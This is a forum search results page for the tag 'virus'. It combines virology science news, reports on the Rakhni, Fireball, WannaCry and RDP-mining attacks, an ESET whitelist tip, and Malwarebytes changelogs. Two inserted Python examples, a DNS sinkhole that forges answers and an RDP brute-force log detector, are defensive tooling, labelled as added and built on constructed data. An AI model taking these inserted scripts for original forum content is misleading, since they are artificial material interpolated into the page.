Search the Community

Showing results for tags 'virus'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 42 results

  1. Viruses are the IKEA furniture of the living world. In the right kind of cell, a handful of instructions and a few molecular tools can churn out multitudes of infectious Billy bookcases. No DIY builder wants to travel all over town to gather materials - theoretically, germs shouldn't be any different. Yet a new discovery suggests at least one category of virus can still pull itself together even if its instructions are split up into separate cells.

    A team of researchers from the Université de Montpellier in France recently conducted an experiment on a group of viruses with genomes made up of more than one distinct section. What they found contradicted some pretty fundamental assumptions about how viruses reproduce.

    To understand the weirdness of their discovery, we first need to back up a little to refresh the basics of virus construction. A typical virus is comprised of little more than nucleic acid inside a protective container. Once smuggled inside a living cell, that nucleic acid sequence is either inserted into the host's own genetic library or used to coerce the cell's molecular assembly line into hammering together fresh copies of the virus.

    Nearly all viruses encode their genetic blueprints on a length of single- or double-stranded nucleic acid. But some single-stranded DNA viruses described as 'multipartite' spread that code across multiple segments, each transmitted in a separate protein box. It's like printing an IKEA manual on loose pages, and then forcing you to wait until an inept postal service delivers the full set of instructions. Sure, some people might be lucky enough to receive the full set, but it's hardly a good business model.

    By delivering their own pages of genetic instructions this way, multipartite viruses seem to be going about reproduction the hard way. Which prompts questions on why such a bizarre method of reproduction even persists.

    But we can't really dismiss them - a variety of these serialised pathogens infect plants and fungi. Only a couple of years ago, one was found infecting animals for the first time. They're hardly doomed to extinction.

    "The chances of a multipartite virus losing an essential genome segment during transmission are estimated to be so high, its ability to successfully cause an infection has been a long-standing mystery," says plant pathologist Anne Sicard.

    Something in our understanding about how viruses reproduce has to give. Either complete sets of instructions are finding their way into single cells after all, or something unique is going on.

    To dig deeper, the team used a faba bean necrotic stunt virus (FBNSV), a pathogen of peas and beans which is made up of eight viral 'chromosome' packages. Fluorescent probes were then used to locate the end delivery points of distinct sections of the genome inside infected faba bean plants. By using different colours of probe and testing for combinations of separated segments, the team were able to verify it was extremely unlikely for a full complement of genetic segments to randomly end up inside any one cell.

    Yet that didn't seem to be preventing segments from being copied. This was true even for segments that weren't integral to the virus's most basic functions, such as replication, encapsidation, and movement within the host.

    "Altogether, we have shown that distinct segments of a virus's genome are not necessarily together within individual host cells, and that accumulation of one genome segment in a cell is entirely independent of accumulation of the others," says virologist Stéphane Blanc.

    The implications of the find suggest the products of one set of genetic instructions can have far-reaching influences, helping activate segments in other cells. The researchers found evidence for this hypothesis when they looked for the molecule encoded by the genome segment responsible for replication. While fewer than half of the plant's cells contained copies of this replication segment, nearly 85 percent of its cells contained its product.

    Strangely, this entire process more closely resembles the workings of a multicellular organism, with separate cells being forced to take on individualised tasks in the construction of a single virus.

    "It is conceivable that this 'multicellular' way of life could be adopted in numerous viral systems and opens up an entirely new research horizon in virology," says Blanc.

    This research was published in eLife.

    Source
  2. Brian12

    Malware Removal Guide

    "This guide will help you remove malicious software from your computer. If you think your computer might be infected with a virus or trojan, you may want to use this guide. It provides step-by-step instructions on how to remove malware from the Windows operating system. It highlights free malware removal tools and resources that are necessary to clean your computer. You will quickly learn how to remove a virus, a rootkit, spyware, and other malware."

    Guide: http://www.selectrealsecurity.com/malware-removal-guide

    I'll be posting updates. :)
  3. Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations, to decide which of the two schemes could be more profitable.

    While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption key required to decrypt your files, cryptocurrency miners utilize an infected system's CPU power to mine digital currencies.

    Both ransomware and cryptocurrency mining-based attacks have been the top threats so far this year and share many similarities: both are non-sophisticated attacks, carried out for money against non-targeted users, and involve digital currency. However, since locking a computer for ransom doesn't always guarantee a payback in case victims have nothing essential to lose, in past months cybercriminals have shifted more towards fraudulent cryptocurrency mining as a method of extracting money using victims' computers.

    Researchers at Russian security firm Kaspersky Lab have discovered a new variant of the Rakhni ransomware family, which has now been upgraded to include cryptocurrency mining capability as well.

    Written in the Delphi programming language, the Rakhni malware is being spread using spear-phishing emails with an MS Word file attached, which, if opened, prompts the victim to save the document and enable editing. The document includes a PDF icon which, if clicked, launches a malicious executable on the victim's computer and immediately displays a fake error message box upon execution, tricking victims into thinking that a system file required to open the document is missing.

    How Malware Decides What To Do

    However, in the background, the malware then performs many anti-VM and anti-sandbox checks to decide if it could infect the system without being caught. If all conditions are met, the malware then performs more checks to decide the final infection payload, i.e., ransomware or miner.

    1.) Installs Ransomware—if the target system has a 'Bitcoin' folder in the AppData section. Before encrypting files with the RSA-1024 encryption algorithm, the malware terminates all processes that match a predefined list of popular applications and then displays a ransom note via a text file.

    2.) Installs cryptocurrency miner—if the 'Bitcoin' folder doesn't exist and the machine has more than two logical processors. If the system gets infected with a cryptocurrency miner, it uses the MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background. Besides this, the malware uses the CertMgr.exe utility to install fake root certificates that claim to have been issued by Microsoft Corporation and Adobe Systems Incorporated in an attempt to disguise the miner as a trusted process.

    3.) Activates worm component—if there's no 'Bitcoin' folder and just one logical processor. This component helps the malware to copy itself to all the computers located in the local network using shared resources.

    Regardless of which infection is chosen, the malware checks whether one of the listed antivirus processes is running. If no AV process is found in the system, the malware will run several cmd commands in an attempt to disable Windows Defender.

    What's more? There's A Spyware Feature As Well

    This malware variant is targeting users primarily in Russia (95.5%), while a small number of infections have been noticed in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.

    The best way to prevent yourself from being a victim of such attacks in the first place is never to open suspicious files and links provided in an email. Also, always keep a good backup routine and updated anti-virus software in place.

    Source
  4. Wissertje

    nsanedown blocked by ESET

    ===== KEYWORDS =====

    nsane.down blocked by ESET, nsanedown blocked by ESET, nsanedown.com blocked by ESET, nsane.down banned by ESET, nsanedown banned by ESET, nsanedown.com banned by ESET, ESET nsane.down block, ESET nsane.down ban, ESET nsanedown block, ESET nsanedown ban, ESET nsanedown.com block, ESET nsanedown.com ban

    ===== SOLUTION =====

    Add *nsanedown.com* and *nsaneforums.com* (with the asterisks (star signs)) to the whitelist as described in the following ESET Knowledge Base article: http://kb.eset.com/esetkb/index?page=content&id=SOLN2960

    ===== ACTUAL TOPIC =====

    Good morning,

    If I go to //www.nsanedown.com/ then ESET blocks the page. Are you guys aware of this? I made some screenshots.

    Regards.

    Virus Database version: 8195

    ===== ADDITIONAL KEYWORDS =====

    ESET fix, ESET box, mara-fix, ESET mara-fix, box, mara-fix, box, mara-fix 1.6, box, mara-fix 1.7, box, mara-fix v1.6, box, mara-fix v1.7, mara-fix, mara-fix 1.6, mara-fix 1.7, mara-fix v1.6, mara-fix v1.7
  5. In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.

    It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this from watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, has whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.

    Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).

    Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug an unpatched computer into the raw Internet, without the benefit of a firewall, it'll get infected within an hour.

    However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened?

    The narrative from the news stories implies some nefarious hacker activity that "targeted" Boeing, but that's unlikely. We now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet.

    The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.

    Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading.

    Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of a killswitch means the virus will continue to run, attacking more systems instead of immediately killing itself.

    One solution to this would be to set up sinkhole DNS servers on the network that resolve all unknown DNS queries to a single server that logs all requests. This is trivially set up with most DNS servers. The logs will quickly identify problems on the network, as well as any hacker or virus activity. The side effect is that it would make this killswitch kill WannaCry. WannaCry isn't sufficient reason to set up sinkhole servers, of course, but it's something I've found generally useful in the past.

    Conclusion

    Something obviously happened to the Boeing plant, but the narrative is all wrong. Words like "targeted attack" imply things that likely didn't happen. Facts are so loose in cybersecurity that it may not have even been WannaCry. The real story is that the original WannaCry is still out there, still trying to spread. Simply put a computer on the raw Internet (without a firewall) and you'll get attacked. That, somehow, isn't news. Instead, what's news is whenever that continued infection hits somewhere famous, like Boeing, even though (as Boeing claims) it had no important effect.

    Source
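The sinkhole idea in the post above, as an added example that is not part of the original post or any DNS server's own code: a minimal UDP responder that answers every A query with one assumed sinkhole address (10.0.0.250, a constructed value), records which client asked for which name, and a helper that counts lookups for names outside an allowlist, which is how a worm's check-in or killswitch lookup shows up in the log. The query name in the test is constructed, not a real indicator.

```python
import socket
import struct
from datetime import datetime, timezone

# Address that every A query is answered with (assumed value for this example).
SINK_IP = "10.0.0.250"


def parse_qname(data: bytes, offset: int):
    """Decode a DNS name starting at offset; return (name, offset_after_name)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            name, _ = parse_qname(data, pointer)
            labels.append(name)
            offset += 2
            break
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Build a plain recursive-desired query; used to construct offline test input."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def sinkhole_reply(query: bytes, client: str, log: list) -> bytes:
    """Answer any A query with SINK_IP and record who asked for what."""
    txid, flags = struct.unpack("!HH", query[:4])
    name, off = parse_qname(query, 12)          # question starts after the 12-byte header
    qtype, _qclass = struct.unpack("!HH", query[off:off + 4])
    log.append({"time": datetime.now(timezone.utc).isoformat(),
                "client": client, "name": name, "qtype": qtype})
    rflags = 0x8480 | (flags & 0x0100)          # QR, AA, RA set; RD copied; RCODE 0
    answers = 1 if qtype == 1 else 0            # only A queries get a forged address
    header = struct.pack("!HHHHHH", txid, rflags, 1, answers, 0, 0)
    answer = b""
    if answers:
        # NAME = pointer to the question name at offset 12; TYPE A, CLASS IN, TTL 60, 4-byte RDATA
        answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4) + socket.inet_aton(SINK_IP)
    return header + query[12:off + 4] + answer


def answered_ip(reply: bytes):
    """Extract the A record address from a sinkhole reply (None when no answer)."""
    ancount = struct.unpack("!H", reply[6:8])[0]
    return socket.inet_ntoa(reply[-4:]) if ancount else None


def unexpected_lookups(log: list, known_good: set) -> dict:
    """Per client, count queries for names outside the expected set.

    Hosts resolving names that nothing on the network should need are the
    ones to inspect first.
    """
    counts = {}
    for entry in log:
        if entry["name"] not in known_good:
            counts[entry["client"]] = counts.get(entry["client"], 0) + 1
    return counts


def serve(bind: str = "0.0.0.0", port: int = 53):
    """Minimal UDP loop: answer every query with SINK_IP and print each log entry."""
    log = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            data, addr = sock.recvfrom(512)
            try:
                sock.sendto(sinkhole_reply(data, addr[0], log), addr)
                print(log[-1])
            except (IndexError, struct.error):
                pass  # malformed packet; ignore it


if __name__ == "__main__":
    serve()
```

Binding port 53 needs privileges; on a test box, pass a high port to serve() and point a client at it.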
  6. Some viruses produce insulin-like hormones that can stimulate human cells -- and have potential to cause disease

    Scientists have identified four viruses that can produce insulin-like hormones that are active on human cells.

    Every cell in your body responds to the hormone insulin, and if that process starts to fail, you get diabetes. In an unexpected finding, scientists at Joslin Diabetes Center have identified four viruses that can produce insulin-like hormones that are active on human cells. The discovery brings new possibilities for revealing biological mechanisms that may cause diabetes or cancer.

    "Our research may help open up a new field that we might call microbial endocrinology," says Emrah Altindis, PhD, a Joslin research fellow and lead author on a paper in the journal PNAS on the work. "We show that these viral insulin-like peptides can act on human and rodent cells. With the very large number of microbial peptides to which we are exposed, there is a novel window for host-microbe interactions. We hope that studying these processes will help us to better understand the role of microbes in human disease."

    "Indeed, the discovery of the viral insulin-like hormones raises the question of what their role might be in diabetes, as well as autoimmune disease, cancer and other metabolic conditions," says C. Ronald Kahn, MD, Joslin's chief academic officer and senior author on the paper.

    The key idea for the investigation came when Altindis, whose previous research focused on creating vaccines against bacteria, attended a Joslin seminar that discussed potential causes of the autoimmune reaction that drives type 1 diabetes. He began to hypothesize whether bacteria or viruses could create insulin-like peptides (small versions of proteins) that could help to trigger the disease.

    By analyzing large public research databases that hold viral genomic sequences, he and his colleagues at Joslin found that various viruses can produce peptides that are similar in whole or in part to 16 human hormones and regulatory proteins.

    "What really caught our attention were four viruses that had insulin-like sequences," says Kahn, who is also the Mary K. Iacocca Professor of Medicine at Harvard Medical School. These viruses were from a family of viruses known to infect fish.

    To find out if they could be active in mammals, the Joslin team collaborated with Richard DiMarchi, professor of chemistry at Indiana University, whose lab chemically synthesized these viral insulin-like peptides (VILPs).

    Experimenting in mouse and human cells, the scientists studied whether the VILPs could act like hormones. Their experiments proved that the VILPs could indeed bind to human insulin receptors and receptors for a closely related hormone called IGF-1 (insulin-like growth factor 1). These are the critical proteins on the cells that tell them to take up glucose and to grow. Additionally, the peptides could stimulate all of the signaling pathways inside the cells that were stimulated by human insulin and IGF-1. And mice injected with the viral peptides exhibited lower levels of blood glucose, another sign of insulin action. Moreover, analysis of databases of viruses found in the human intestine showed evidence that humans are exposed to these viruses.

    "These viruses are definitely known to infect fish and amphibians, but they are not known to infect humans," Kahn points out. "However, it's possible that humans get exposed to these viruses through just eating fish. Nobody has checked directly whether under some conditions the viruses could either infect cells or be at least partly absorbed through the gut intestine."

    The scientists now will broaden their search for other viruses that produce human-like hormones. "This finding is the tip of an iceberg," Kahn says. "There are thought to be more than 300,000 viruses that can infect or be carried in mammals, and only 7,500 or so of these, or about 2.5%, have been sequenced. Thus, we certainly expect to find many more viral hormones, including more viral insulins, in the future."

    "This research also opens up a new aspect to study in type 1 diabetes and autoimmunity," he says. "It may be that these or similar microbial insulin-like molecules could be an environmental trigger to start the autoimmune reaction in type 1 diabetes. On the other hand, you could also imagine that this might desensitize the immune response and could be protective."

    A similar question is open for metabolic diseases such as type 2 diabetes and obesity, in which the body fails to respond properly to insulin. "You could envision that these viral peptides could either protect from or contribute to insulin resistance," Kahn says.

    These or similar viruses might also be a factor in certain human cancers. "If these viruses are inside the gut, could the VILPs they produce stimulate growth of gut cells so that you get polyps or tumors of the gut?" Kahn asks. "Or if they're absorbed or become infectious, could they infect any organ in the body?"

    Analyzing such viral peptides may eventually help drug companies to design new forms of synthesized human insulins. "We might be able to learn something, for example, about making insulins that don't need refrigeration and can be stored for long periods of time, or insulins that are absorbed more quickly or degrade more slowly," he suggests.

    Given Altindis's earlier research on infectious disease rather than in endocrinology, "our discovery gives an example of how work in one field can stimulate thought in another field," Kahn adds. "It really underlines the importance of cross-fertilization in the scientific discovery process, which is so valuable but so underappreciated."

    Source
  7. FIREBALL – The Chinese Malware of 250 Million Computers Infected

    An invasive form of malware believed to be attached to a Chinese firm could spell "global catastrophe," according to the cybersecurity firm that discovered it. The software has the power to gain near-complete control of targets, including spying on files.

    Dubbed Fireball, the malware was found by researchers at Check Point Security. The team said its purpose is to hijack web traffic to generate fraudulent ad revenue. It also includes remote control features for downloading more malware in the future.

    Fireball has already infected over 250 million computers worldwide. When it embeds itself into a machine, it takes control of the web browsers and "turns them into zombies." The browsers end up acting on Fireball's behalf. While it's currently relatively innocuous, focusing on installing plugins to increase ad distribution, Check Point warned it could easily be modified to be more sinister.

    Because Fireball is so powerful, it can be expected it will soon be used as the basis of more serious attacks. It can execute any code it desires on the user's machine, allowing it to steal files, spy on login activity and download additional malware. Although it's currently seeing use only as a browser hijacker for money-making purposes, Check Point explained that the potential is there to do much more.

    "How severe is it? Try to imagine a pesticide armed with a nuclear bomb," the company said. "Yes, it can do the job, but it can also do much more."

    Fireball was created by a Chinese firm called Rafotech. It is believed it has managed to infect so many machines worldwide because it frequently comes bundled with other applications. Users inadvertently install the software by blindly clicking through prompts from other apps. Check Point said that Rafotech "carefully walks along the edge of legitimacy." The company purports to offer search and marketing services but many of its products appear to be fake or hijacking tools. In a curious coincidence, Rafotech's website proudly advertises that it reaches "300 million users," a similar figure to Fireball's global reach.

    According to Check Point, Rafotech has the capability to "initiate a global catastrophe." If the company chose to use all of its software's capabilities, it could extract data from over 250 million PCs worldwide. Around 20% of the total Fireball installations are on corporate networks. It would be able to steal and sell sensitive documents, banking details and medical files. If it wanted, it could instruct Fireball to download ransomware utilities, allowing it to extort money from businesses around the globe.

    Even if Rafotech itself remains content to settle in the grey area of shady bundled software, there are already many similar browser hijackers in existence. Check Point found that Beijing-based ELEX Technology produces a series of products that may be related to Fireball. It is suspected that ELEX Technology and Rafotech are in some way related. Even if they're not directly under the same leadership, they appear to be aiding each other's distribution of browser hijacking utilities. This suggests there are at least two collaborators with potentially unhindered access to a quarter of a billion computers worldwide.

    Check Point said Fireball represents a "great threat" to global cybersecurity and could be the largest infection campaign in history. While its current intentions don't appear to be strongly malicious, there's nothing stopping its creators from embarking on a very different campaign. The distribution also presents other risks – if external hackers obtained the software, they could republish it themselves and unlock all its capabilities.

    Article source
  8. In this week's Tales From Ransomware, we take a look at a ransomware that isn't really ransomware. Nor even malware. But it can hijack your server anyway.

    A few days ago we saw a typical Remote Desktop Protocol (RDP) attack, which led us to believe that it was a similar attack to the one we told you about a few months ago which cybercriminals are using to infect devices with ransomware. But we were very wrong. First of all because instead of encrypting data, it locks the desktop with a password that the victim doesn't know. Secondly, it does not demand a ransom (!) in exchange for the credential, but rather seeks to keep the device locked for as long as possible so that it can be used for bitcoin mining for as long as possible. And thirdly, it doesn't use malware as such.

    Once they've gained access to your machine by brute force (this particular server was fielding 900 attempts daily) the attacker copies a file called BySH01.zip. This in turn contains:

    • BySH01.exe (executable through AutoIt)
    • 7za.exe (goodware, the well-known free tool 7zip)
    • tcping.exe (goodware, a tool for performing TCP pings)
    • MW_C.7z (a compressed password-protected file), which contains:
      • An application (goodware) for bitcoin mining
      • An application (goodware) for blocking the Windows desktop

    The attacker runs the BySH01.exe file, and the following interface appears:

    Кошелек – Wallet; Имя воркера – User Name; Количество ядер – Number of cores; Пароль – Password; Локация – Location; Пусть установки – Installation path; Расширения системы – Processor Extension; Порт – Port; Добавить в автозагрузку – Add to startup; Установить – Install; Удалить – Delete; Тест – Test; Пинг – Ping; Локер – Locker

    With the help of our colleagues at Panda Russia, those of us who don't know Russian can get an approximate idea of what it's telling us with the above word list. Basically, the bitcoin mining application uses this interface to configure how many cores to use, what extension of processor instructions to use, what "wallet" to send the bitcoins to, etc.

    Once the desired configuration is selected, the attacker clicks on Установить to install and run the bitcoin mining application. The application is called CryptoNight, which was designed for mining bitcoins using CPUs. Then they click on Локер, which installs and runs the desktop lock application. It is the commercial application Desktop Lock Express 2, modified only so that the information shown in the properties of the file is the same as that of the system file svchost.exe. Finally it clears all the files used in the attack except CryptoNight and Desktop Lock Express 2.

    [Image: Desktop Lock Express 2, the application used by the attackers.]

    We detected and blocked several attacks in different countries. Examples such as this one show how, once again, cybercriminals take advantage of weak passwords that can be guessed using the brute force method over a given period of time. Malware is no longer necessary to gain access to the system, so it's up to you to use a robust password that will keep out unwanted visitors.

    Tips for the System Admin

    In addition to using a solution like Adaptive Defense, which detects and prevents this kind of attack, a couple of tidbits of advice for all administrators who have to have an open RDP:

    • Configure it to use a non-standard port. What 99.99% of cybercriminals do is scan the whole Internet on TCP and UDP port 3389. They might bother to scan others, but they do not have to, since most do not change these ports. Those who do change ports do so because they are careful about security, which probably means that their credentials are already complex enough to not be obtained by brute force within any reasonable amount of time.
    • Monitor failed RDP connection attempts. Brute force attacks can easily be identified in this way, since they use automated systems and can be seen making a new attempt every few seconds.

    Article source
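The "monitor failed RDP connection attempts" advice above, worked through as an added example that is not part of the original post or of any Panda product: it parses constructed, simplified one-line renderings of Windows Security events 4625 (failed logon) and 4624 (successful logon) with logon type 10 (RemoteInteractive, i.e. RDP), flags sources that accumulate a threshold of failures inside a short window, reports the shortest gap between attempts (the "every few seconds" signature), and notes when a flagged source then logs on successfully, which is what a guessed password looks like. The log lines, addresses, user names and thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (not real logs): timestamp, event id, logon type,
# account name, source address. Logon type 10 is RDP; 3 is a network logon.
SAMPLE_LOG = """\
2017-06-01T08:00:01 4625 LogonType=10 User=administrator Source=203.0.113.7
2017-06-01T08:00:04 4625 LogonType=10 User=admin Source=203.0.113.7
2017-06-01T08:00:07 4625 LogonType=10 User=test Source=203.0.113.7
2017-06-01T08:00:10 4625 LogonType=10 User=user Source=203.0.113.7
2017-06-01T08:00:13 4625 LogonType=10 User=backup Source=203.0.113.7
2017-06-01T08:00:16 4625 LogonType=10 User=administrator Source=203.0.113.7
2017-06-01T08:00:19 4624 LogonType=10 User=administrator Source=203.0.113.7
2017-06-01T08:05:00 4625 LogonType=10 User=jsmith Source=198.51.100.5
2017-06-01T08:05:20 4624 LogonType=10 User=jsmith Source=198.51.100.5
2017-06-01T08:06:00 4625 LogonType=3 User=svc Source=198.51.100.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>\d{4}) LogonType=(?P<ltype>\d+) "
    r"User=(?P<user>\S+) Source=(?P<src>\S+)$"
)


def parse_events(text: str) -> list:
    """Turn the one-line records into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "event": int(m["event"]),
            "ltype": int(m["ltype"]),
            "user": m["user"],
            "src": m["src"],
        })
    return events


def detect_rdp_bruteforce(events: list, threshold: int = 5, window_s: int = 60) -> dict:
    """Flag sources with at least `threshold` failed RDP logons inside `window_s` seconds.

    Returns {source: {"failures", "users", "min_gap_s", "success_after"}}.
    success_after is True when the same source logged on successfully after
    crossing the threshold, i.e. the guess apparently worked.
    """
    by_src = defaultdict(list)
    for e in events:
        if e["ltype"] == 10:                       # RDP sessions only
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["event"] == 4625]
        hit = None                                 # sliding window over the failures
        for i in range(len(fails)):
            j = i + threshold - 1
            if j < len(fails) and (fails[j]["ts"] - fails[i]["ts"]).total_seconds() <= window_s:
                hit = (fails[i]["ts"], fails[j]["ts"])
                break
        if hit is None:
            continue
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(fails, fails[1:])]
        success_after = any(e["event"] == 4624 and e["ts"] >= hit[1] for e in evs)
        alerts[src] = {
            "failures": len(fails),
            "users": sorted({e["user"] for e in fails}),
            "min_gap_s": min(gaps) if gaps else None,
            "success_after": success_after,
        }
    return alerts


def analyze(text: str = SAMPLE_LOG, **kwargs) -> dict:
    """Parse and detect in one step; kwargs are passed to detect_rdp_bruteforce."""
    return detect_rdp_bruteforce(parse_events(text), **kwargs)


if __name__ == "__main__":
    for src, info in analyze().items():
        print(src, info)
```

Real 4625 events carry the source in the IpAddress field and the logon type in LogonType; adapt LINE_RE (or read the event XML) to whatever your collector emits.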
  9. Malwarebytes 3.0.6

    Overview: 4x stronger, 4x faster

    Our engineers have now made your best defense against advanced threats even better. Malwarebytes 3.0 now offers four malware-fighting modules:

    • Anti-malware
    • Anti-ransomware
    • Anti-exploit
    • Malicious website protection

    You have all the best Malwarebytes detection, protection, and malware-removal in one tight package. Stop paying for your old, clunky antivirus.

    Product Page & Comparison: https://www.malwarebytes.com/premium/

    Free features

    • Anti-malware/Anti-spyware: Detects and removes malware and advanced threats.
    • Anti-rootkit: Removes rootkits and repairs the files they damage.

    Premium features

    • Real-time protection: Detects malware automatically, before it can infect.
    • Anti-exploit: Shields vulnerable systems and software from exploit attacks.
    • Anti-ransomware: Stops ransomware attacks before your data is held hostage.
    • Malicious website protection: Prevents access to and from known malicious webpages.

    Changelog: https://forums.malwarebytes.com/topic/194279-malwarebytes-306-release-preview-now-available/

    Performance/protective capability

    • Several improvements to malware detection and remediation capabilities
    • Several performance improvements, including improving startup time, improving shutdown time on Windows 7, addressing memory leaks and reducing CPU usage after a scan has completed
    • Added MS Publisher as a default Protected Application for anti-exploit protection

    Usability

    • Fixed issue where a previously activated Premium license could be dropped incorrectly
    • Fixed issue where Malwarebytes version information would revert to default values of 3.0.0 in certain cases, such as when coming back from minimal safe mode
    • Fixed issue where 'Real-Time Protection turned off' notifications would display incorrectly on initial startup
    • Fixed problem where the 'Check for updates every' setting would get stuck at 14 days after changing frequency to 'Days'
    • Fixed Help question marks throughout the main user interface so that they work when clicked

    Stability/issues fixed

    • Addressed several crashes and blue screens, including the BSOD that could occur with Web Protection on Windows Insider Previews
    • Fixed the issue with Exploit Protection that caused Edge to crash/hang on Windows Insider Previews
    • Fixed issue when Exploit Protection was enabled that caused PowerPoint to not load
    • Fixed conditions that could lead to an 'Unable to connect to service' error
    • Fixed issue where exclusions did not work properly when there were associated threat traces detected
    • Fixed issue where Web Protection would not start up properly
    • Fixed numerous scan hangs or crashes, including one that could occur during heuristics phase
    • Numerous other fixes to improve overall program stability and usability

    The one notable issue that was not able to be included in this release was a problem with imaging programs (such as Macrium Reflect) where large artifact files are left in the System Volume Information folder if a backup is created with anti-ransomware protection enabled. That one should be coming soon after this release!

    gHacks Review Article: Malwarebytes 3.0: new all-in-one protection

    Downloads: https://malwarebytes.box.com/s/nlda32e9t259ct2pt9r0h2a111iz2lvg - [Size: 52.9 MB]
  10. Malwarebytes 3.0 Final Stable

    Overview: 4x stronger, 4x faster
    Our engineers have now made your best defense against advanced threats even better. Malwarebytes 3.0 now offers four malware-fighting modules: Anti-malware, Anti-ransomware, Anti-exploit and Malicious website protection. You have all the best Malwarebytes detection, protection, and malware-removal in one tight package. Stop paying for your old, clunky antivirus.

    Product Page & Comparison: https://www.malwarebytes.com/premium/

    Free features
    - Anti-malware/Anti-spyware: Detects and removes malware and advanced threats.
    - Anti-rootkit: Removes rootkits and repairs the files they damage.

    Premium features
    - Real-time protection: Detects malware automatically, before it can infect.
    - Anti-exploit: Shields vulnerable systems and software from exploit attacks.
    - Anti-ransomware: Stops ransomware attacks before your data is held hostage.
    - Malicious website protection: Prevents access to and from known malicious webpages.

    Changelog: https://www.malwarebytes.com/support/releasehistory/#malwarebytes-premium

    Performance/protective capability
    - Added signature-less anti-exploit and anti-ransomware protection (Premium only)
    - Up to 4x faster scan speeds, including even quicker Hyper Scans
    - Removed non-essential reboots after certain malware removal events
    - Advanced heuristic engine (Shuriken) now enabled by default
    - Self-protection now enabled by default (Premium only)

    Usability
    - Redesigned user interface for improved user experience
    - Now configurable to integrate with Windows Action Center/Windows Security Center (Premium only)
    - Update checks are done automatically so they don’t need to be scheduled
    - Improved support for keyboard navigation and screen readers

    Stability/issues fixed
    - Added ability to lock down My Account screen via User Access Policy
    - Added ability to collect enhanced logs when directed to do so by support
    - Fixed issue where Scheduler did not adjust for Daylight Saving Time
    - Fixed issue where Scheduler defaulted to hourly Threat Scan instead of daily
    - Fixed issue where Chameleon reported error messages numerous times to Windows Event Viewer
    - Changed “Recover if missed by” setting in Scheduler to “Off” by default
    - Prevented rootkit scanning in Custom Scans if full system drive is not selected
    - Updated to latest version of 7-Zip DLL
    - Addressed other miscellaneous defects

    gHacks Review Article: Malwarebytes 3.0: new all-in-one protection
